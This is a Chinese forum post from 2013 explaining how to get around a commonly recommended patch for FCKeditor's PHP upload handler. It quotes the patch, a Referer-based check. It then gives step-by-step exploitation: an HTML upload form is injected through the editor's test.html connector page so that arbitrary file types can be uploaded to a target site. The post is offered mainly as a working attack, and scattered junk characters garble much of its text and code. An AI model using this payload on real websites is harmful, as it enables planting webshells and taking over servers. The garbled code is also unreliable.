找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2228|回复: 0
打印 上一主题 下一主题

fckeditor 漏洞修复后的二次利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:12:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php5 y" G( j/ l3 _" y
网上给出的修复方案是/ p- z  @) Q  N% g% I
修复方法,删除FCK编辑器用其他的编辑器, U: H; j; E  w3 v4 y
或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件' t- S2 b2 o5 z+ @
/ U+ ^# n, c* X, B
require(‘config.php’);
7 }4 l' b' A: a& z5 Q3 arequire(‘util.php’);
; Y4 d' ~! q  J% A8 q! }3 b+ ^的下面添加以下代码—————————–
6 _  F. X  `- N0 T( r//防止外部提交! k4 }8 w" r4 ^! p
function outsidepost()
6 S, ?5 g- d. A5 b{! z- @3 ?# ]7 ?2 Z8 s3 S' p
$servername=$_SERVER['SERVER_NAME'];& x0 X% }+ K* ?
$sub_from=@$_SERVER['HTTP_REFERER'];
/ K; O2 o. Y' W9 l$sub_len=strlen($servername);
% X* S; f- x) X3 m" z+ P" x$checkfrom=substr($sub_from,7,$sub_len);' ^# [+ l5 [" ]: E3 [% ?1 I$ U: w' ?
if($checkfrom!=$servername){
1 H! t4 e7 l* r& k) secho(“you don’t outsidepost!”);
( q# r4 x4 ^7 z5 R. }3 P* e8 o1 G+ lexit;3 B, q' a: f" L
}0 M# L5 x+ n& X) L+ v0 |
}
. [$ E- S1 W( u& F* s! ?( \5 ^" Woutsidepost();3 _8 ^; h3 \) W/ {" `" _
防止外部提交,但是没有防止内部提交,0 w" t& _8 U3 r
利用方法:
5 K4 @5 T6 f# P# S( W4 `4 G1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html  s- R7 Y5 p! {; m8 i3 L
2,在Current Folder 框输入  b+ L+ s) {5 {1 k8 h1 L& C
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
+ o* @' O- X+ _' `4 L9 R+ [然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。8 `0 R5 A0 ?0 O8 r8 @
PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表